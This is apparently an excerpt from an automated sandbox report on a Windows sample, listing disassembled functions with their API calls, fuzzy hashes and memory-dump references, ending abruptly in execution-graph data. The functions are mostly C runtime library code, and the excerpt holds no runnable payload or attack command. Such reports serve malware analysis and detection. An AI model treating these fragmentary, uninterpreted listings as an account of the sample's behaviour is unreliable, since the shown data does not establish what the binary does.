                                                                      Function 00007FF73CFC6C90 Relevance: 12.2, APIs: 8, Instructions: 206COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73CFC6FCD), ref: 00007FF73CFC6D2A
                                                                      • malloc.LIBCMT ref: 00007FF73CFC6D93
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73CFC6FCD), ref: 00007FF73CFC6DC7
                                                                      • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73CFC6FCD), ref: 00007FF73CFC6DEE
                                                                      • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73CFC6FCD), ref: 00007FF73CFC6E36
                                                                      • malloc.LIBCMT ref: 00007FF73CFC6E93
                                                                        • Part of subcall function 00007FF73CFC8CD4: _FF_MSGBANNER.LIBCMT ref: 00007FF73CFC8D04
                                                                        • Part of subcall function 00007FF73CFC8CD4: HeapAlloc.KERNEL32(?,?,00000000,00007FF73CFC74D0,?,?,?,00007FF73CFC7395,?,?,?,00007FF73CFC743F), ref: 00007FF73CFC8D29
                                                                        • Part of subcall function 00007FF73CFC8CD4: _callnewh.LIBCMT ref: 00007FF73CFC8D42
                                                                        • Part of subcall function 00007FF73CFC8CD4: _errno.LIBCMT ref: 00007FF73CFC8D4D
                                                                        • Part of subcall function 00007FF73CFC8CD4: _errno.LIBCMT ref: 00007FF73CFC8D58
                                                                      • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73CFC6FCD), ref: 00007FF73CFC6EC8
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73CFC6FCD), ref: 00007FF73CFC6F08
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiStringWide$_errnomalloc$AllocHeap_callnewh
                                                                      • String ID:
                                                                      • API String ID: 3905601649-0
                                                                      • Opcode ID: 2ff4a7507a82664706b41ccc9cbd6ec1c06fa3633e00bf2ef3564a6fd6ba3400
                                                                      • Instruction ID: 8a2d26c0b19d2fa63b9dbfb4399e6fdfa2b400ecd657771aa9a31ddff92d52f5
                                                                      • Opcode Fuzzy Hash: 2ff4a7507a82664706b41ccc9cbd6ec1c06fa3633e00bf2ef3564a6fd6ba3400
                                                                      • Instruction Fuzzy Hash: C981C233B0C783A6EB24AF25D4401A9B6D5FB447A8F948A35EA9D43BD4DF3CE4019720
                                                                      Function 00007FF73CFC7334 Relevance: 9.1, APIs: 6, Instructions: 59COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockmalloc
                                                                      • String ID:
                                                                      • API String ID: 2923989369-0
                                                                      • Opcode ID: bc655189494912a802cf5939326c0831d488f45ff90a1d662128a5e15a8b38dc
                                                                      • Instruction ID: 294b73b83498f4492962796b2888f7683b1c55facac5aeb9607a2bd1a736a1fe
                                                                      • Opcode Fuzzy Hash: bc655189494912a802cf5939326c0831d488f45ff90a1d662128a5e15a8b38dc
                                                                      • Instruction Fuzzy Hash: 9B213CA2F08647A1F655BB21944477AE2D4AF40794FD4CC36E9DE466D2CF3CA480A330
                                                                      Function 00007FF73CFC3EF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc$FreeLocal$FileMemoryPointerProcessWrite
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 3690204003-3502785670
                                                                      • Opcode ID: bfe815200edb62b6d5542a813ca1b1f70e712d92eb9977d59844b44778e0b4c3
                                                                      • Instruction ID: 168dbb2189149533249ed1c0df52b6ba54b381b29dc88283d08b1fee7e135c7b
                                                                      • Opcode Fuzzy Hash: bfe815200edb62b6d5542a813ca1b1f70e712d92eb9977d59844b44778e0b4c3
                                                                      • Instruction Fuzzy Hash: A1311C33B04B42A9EB14DF61E8800ACB3F4FB48788B848935DA8D57B58DF38E559D760
                                                                      Function 00007FF73CFC3FEE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLocalModuleProc
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 1697219777-3502785670
                                                                      • Opcode ID: cb2947bb03def20f4983750d2723422282199711071f6f6c57adc94798bf4ce7
                                                                      • Instruction ID: ffdd544b57d43d2c281959e6f7f81e93c344eac5bdc8df69c4704eeb7500360c
                                                                      • Opcode Fuzzy Hash: cb2947bb03def20f4983750d2723422282199711071f6f6c57adc94798bf4ce7
                                                                      • Instruction Fuzzy Hash: 53310727B59F07A5FB40AB60E8443B863F4BB48788F848935CA8D53668DF3CE159D320
                                                                      Function 00007FF73CFC8610 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DecodePointer.KERNEL32(?,?,?,00007FF73CFC8725,?,?,?,?,00007FF73CFC598A,?,?,?,00007FF73CFC44D4), ref: 00007FF73CFC8639
                                                                      • DecodePointer.KERNEL32(?,?,?,00007FF73CFC8725,?,?,?,?,00007FF73CFC598A,?,?,?,00007FF73CFC44D4), ref: 00007FF73CFC8649
                                                                        • Part of subcall function 00007FF73CFC910C: _errno.LIBCMT ref: 00007FF73CFC9115
                                                                        • Part of subcall function 00007FF73CFC910C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73CFC9120
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FF73CFC8725,?,?,?,?,00007FF73CFC598A,?,?,?,00007FF73CFC44D4), ref: 00007FF73CFC86C7
                                                                        • Part of subcall function 00007FF73CFC75A4: realloc.LIBCMT ref: 00007FF73CFC75CF
                                                                        • Part of subcall function 00007FF73CFC75A4: Sleep.KERNEL32(?,?,00000000,00007FF73CFC86B7,?,?,?,00007FF73CFC8725,?,?,?,?,00007FF73CFC598A), ref: 00007FF73CFC75EB
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FF73CFC8725,?,?,?,?,00007FF73CFC598A,?,?,?,00007FF73CFC44D4), ref: 00007FF73CFC86D7
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FF73CFC8725,?,?,?,?,00007FF73CFC598A,?,?,?,00007FF73CFC44D4), ref: 00007FF73CFC86E4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                      • String ID:
                                                                      • API String ID: 1909145217-0
                                                                      • Opcode ID: e41475865cdc026077d39e2ccd95283321267069a2bcd4671505f549074d287f
                                                                      • Instruction ID: 4a241206ad9f435caa5ff18a474eea4297ef7c9a78a3faac77a934fc4154b6d7
                                                                      • Opcode Fuzzy Hash: e41475865cdc026077d39e2ccd95283321267069a2bcd4671505f549074d287f
                                                                      • Instruction Fuzzy Hash: C8218063B0A747A1EA00BB21E948179E3E1BF44BD0BC48C35D98D07359DE7CE885E360
                                                                      Function 00007FF73CFC6A58 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1445889803-0
                                                                      • Opcode ID: b5717c3ae1978e90090d18bddf620ebef6e1dda1b2ac5f81843dbc827e59ee84
                                                                      • Instruction ID: c735d55a1debdda44ce0266d819acd938da6dfb975798702fb9ef4f19cc4a7a7
                                                                      • Opcode Fuzzy Hash: b5717c3ae1978e90090d18bddf620ebef6e1dda1b2ac5f81843dbc827e59ee84
                                                                      • Instruction Fuzzy Hash: 7601A52275CA0692E7509F21F454265A3A4FB09B90F84AA30DE9E477A4CE3DD8849710
                                                                      Function 00007FF73CFC5200 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF73CFC57A1,?,?,?,?,00007FF73CFC42F5,?,?,?,?,00007FF73CFC365D), ref: 00007FF73CFC520A
                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF73CFC57A1,?,?,?,?,00007FF73CFC42F5,?,?,?,?,00007FF73CFC365D), ref: 00007FF73CFC5218
                                                                      • SetLastError.KERNEL32(?,?,?,00007FF73CFC57A1,?,?,?,?,00007FF73CFC42F5,?,?,?,?,00007FF73CFC365D), ref: 00007FF73CFC5270
                                                                        • Part of subcall function 00007FF73CFC7520: Sleep.KERNEL32(?,?,?,00007FF73CFC5233,?,?,?,00007FF73CFC57A1,?,?,?,?,00007FF73CFC42F5), ref: 00007FF73CFC7565
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF73CFC57A1,?,?,?,?,00007FF73CFC42F5,?,?,?,?,00007FF73CFC365D), ref: 00007FF73CFC5244
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FF73CFC5258
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue_lock$CurrentSleepThread
                                                                      • String ID:
                                                                      • API String ID: 2194181773-0
                                                                      • Opcode ID: 36c60fb1fc5478d2714b7cf1bc2d67d0d037515c9517970b45afcbe01da3439c
                                                                      • Instruction ID: fe8774ee739574ee2435e7fd6aab4a384f2c67e0822e4ece3ca73653d9f77b09
                                                                      • Opcode Fuzzy Hash: 36c60fb1fc5478d2714b7cf1bc2d67d0d037515c9517970b45afcbe01da3439c
                                                                      • Instruction Fuzzy Hash: 93012522B09B03A6FB557B65E445079A2D1AF48B60F89CB34D99D023D5DE3CF444A620
                                                                      Function 00007FF73CFC41D4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: _errno_getptd_invalid_parameter_noinfoiswctype
                                                                      • String ID: A$Z
                                                                      • API String ID: 3686281101-4098844585
                                                                      • Opcode ID: 7471cf975a6c2e899fc60685f9a1016f05e03f026487ea75407b715c0f360e66
                                                                      • Instruction ID: 3839b39936aec11a9e9acd9ea5981de33e27372d5a4970fd83cc6ffb43f6e4ad
                                                                      • Opcode Fuzzy Hash: 7471cf975a6c2e899fc60685f9a1016f05e03f026487ea75407b715c0f360e66
                                                                      • Instruction Fuzzy Hash: 7F21B873F18A9393EB607715A0411F9EAE0EB80BA1FD4C531EADE076C4CE2CD841A720
                                                                      Function 00007FF73CFC224C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc$FilePointer
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 566066777-3502785670
                                                                      • Opcode ID: ae4bdf1545d5b3bea47cb7be4399879195951017214af75440566f936ed4c44c
                                                                      • Instruction ID: c96ff2746e638a154d03a7e67a72d3267ba04702489c6071e810cd9807bbd81d
                                                                      • Opcode Fuzzy Hash: ae4bdf1545d5b3bea47cb7be4399879195951017214af75440566f936ed4c44c
                                                                      • Instruction Fuzzy Hash: 56118833B08B4292EB04EB04F88406DB3E4FB48B84B558235DA9C43764EF3AE896C710
                                                                      Function 00007FF73CFC3A80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 1646373207-3502785670
                                                                      • Opcode ID: 768c83978b35878a8f958784c4e0d899e0f3712db5d3c7c46bf7aa8f2928ed0d
                                                                      • Instruction ID: 20e75b9852bc1de7b7f629c3b93f898cb8f82fa1531abece52a2edb5fe86125c
                                                                      • Opcode Fuzzy Hash: 768c83978b35878a8f958784c4e0d899e0f3712db5d3c7c46bf7aa8f2928ed0d
                                                                      • Instruction Fuzzy Hash: 5BF0B456B05647A1EF0CAF56E484474A3A0EF48BC4B88D531CB8D07754EE3CE098D320
                                                                      Function 00007FF73CFC5814 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF73CFC585D,?,?,00000028,00007FF73CFC8D1D,?,?,00000000,00007FF73CFC74D0,?,?,?,00007FF73CFC7395), ref: 00007FF73CFC5823
                                                                      • GetProcAddress.KERNEL32(?,?,000000FF,00007FF73CFC585D,?,?,00000028,00007FF73CFC8D1D,?,?,00000000,00007FF73CFC74D0,?,?,?,00007FF73CFC7395), ref: 00007FF73CFC5838
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 1646373207-1276376045
                                                                      • Opcode ID: 2e7156098e7d4b22c2cdf77a18da4477a529ad48e7687adc2817a342e21d314d
                                                                      • Instruction ID: e0dd419a634900104d2c1c763f12e149138354ea708dc4a4280532369febe418
                                                                      • Opcode Fuzzy Hash: 2e7156098e7d4b22c2cdf77a18da4477a529ad48e7687adc2817a342e21d314d
                                                                      • Instruction Fuzzy Hash: DEE0EC12F5960361FF197B60A89853453E0BF48740B889938C89E45390DE2CB59EEA20
                                                                      Function 00007FF73CFC834C Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                                                                      • String ID:
                                                                      • API String ID: 27599310-0
                                                                      • Opcode ID: d1aff7f8dd491d9a2af4ff98f426b5defa286991a079765ade965f3974373ef1
                                                                      • Instruction ID: 1e98bb5c59dc26c41f25b1dc062310f47217a31aaf1d4b3fa61fb201166f640f
                                                                      • Opcode Fuzzy Hash: d1aff7f8dd491d9a2af4ff98f426b5defa286991a079765ade965f3974373ef1
                                                                      • Instruction Fuzzy Hash: EE516C33B0C643B6EA69AB14A44423AE7D1EB84754FE4CD35D99E02698CF7CE845A221
                                                                      Function 00007FF73CFC6FF4 Relevance: 6.1, APIs: 4, Instructions: 102COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$StringTypemalloc
                                                                      • String ID:
                                                                      • API String ID: 4066956681-0
                                                                      • Opcode ID: 3c67af3a7237179b16aed0a02624798f9160055e14e0f8ff9ff85d4aae7233b0
                                                                      • Instruction ID: 889de1541789edafba2aad77c564e77702b1710bcdaf964c7cb230038c586890
                                                                      • Opcode Fuzzy Hash: 3c67af3a7237179b16aed0a02624798f9160055e14e0f8ff9ff85d4aae7233b0
                                                                      • Instruction Fuzzy Hash: 5541B763B04B8396EB10AF2598001A9A3D5FF44BA8F988A32EE6D477D4DF3DE4059310
                                                                      Function 00007FF73CFC509C Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: _amsg_exit_getptd$_lock
                                                                      • String ID:
                                                                      • API String ID: 3670291111-0
                                                                      • Opcode ID: 993534dfc6f72033878c1470825db430e2c975b239a47a9683bd1f3504e1619f
                                                                      • Instruction ID: c6f8f274cd57cba724161c3a75c1873899f5e2821da765a43ac26e5c9c17701c
                                                                      • Opcode Fuzzy Hash: 993534dfc6f72033878c1470825db430e2c975b239a47a9683bd1f3504e1619f
                                                                      • Instruction Fuzzy Hash: B2F04F13B09043A2FB54B75088517B893D0AF54704F888935DA8D4B3C2DE1CA444F260

                                                                      Execution Graph

                                                                      Execution Coverage:5.4%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:3.7%
                                                                      Total number of Nodes:1716
                                                                      Total number of Limit Nodes:74
                                                                      execution_graph 10278 df691c 10285 dfb481 10278->10285 10281 df692f 10283 df5e4c _free 66 API calls 10281->10283 10284 df693a 10283->10284 10298 dfb3a7 10285->10298 10287 df6921 10287->10281 10288 dfb25b 10287->10288 10289 dfb267 ___lock_fhandle 10288->10289 10290 df94b6 __lock 66 API calls 10289->10290 10293 dfb273 10290->10293 10291 dfb2d9 10328 dfb2ee 10291->10328 10293->10291 10296 dfb2ae RtlDeleteCriticalSection 10293->10296 10315 dfdf40 10293->10315 10294 dfb2e5 ___lock_fhandle 10294->10281 10297 df5e4c _free 66 API calls 10296->10297 10297->10293 10299 dfb3b3 ___lock_fhandle 10298->10299 10300 df94b6 __lock 66 API calls 10299->10300 10303 dfb3c2 10300->10303 10301 dfb45a 10311 dfb478 10301->10311 10303->10301 10305 df697d _flsall 67 API calls 10303->10305 10307 dfb35f 101 API calls __fflush_nolock 10303->10307 10308 dfb449 10303->10308 10304 dfb466 ___lock_fhandle 10304->10287 10305->10303 10307->10303 10309 df69eb _vwscanf 2 API calls 10308->10309 10310 dfb457 10309->10310 10310->10303 10314 df93dd RtlLeaveCriticalSection 10311->10314 10313 dfb47f 10313->10304 10314->10313 10316 dfdf4c ___lock_fhandle 10315->10316 10317 dfdf5e 10316->10317 10318 dfdf73 10316->10318 10319 df7924 __cftof2_l 66 API calls 10317->10319 10325 dfdf6e ___lock_fhandle 10318->10325 10331 df693c 10318->10331 10320 dfdf63 10319->10320 10322 df78d2 __cftof2_l 11 API calls 10320->10322 10322->10325 10325->10293 10418 df93dd RtlLeaveCriticalSection 10328->10418 10330 dfb2f5 10330->10294 10332 df694e 10331->10332 10333 df6970 RtlEnterCriticalSection 10331->10333 10332->10333 10334 df6956 10332->10334 10336 df6966 10333->10336 10335 df94b6 __lock 66 API calls 10334->10335 10335->10336 10337 dfded3 10336->10337 10338 dfdef8 10337->10338 10339 dfdee4 10337->10339 10341 dfdef4 10338->10341 10342 dfb2f7 __flush 97 API calls 10338->10342 10340 df7924 __cftof2_l 66 API calls 10339->10340 10343 dfdee9 10340->10343 10353 dfdfac 10341->10353 10344 dfdf04 10342->10344 10345 df78d2 __cftof2_l 11 API calls 10343->10345 10356 dff0b2 10344->10356 10345->10341 10348 dfb4e0 __input_l 66 API calls 10349 dfdf12 10348->10349 10360 dfefee 10349->10360 10351 dfdf18 10351->10341 10352 df5e4c _free 66 API calls 10351->10352 10352->10341 10411 df69af 10353->10411 10355 dfdfb2 10355->10325 10357 dff0c2 10356->10357 10359 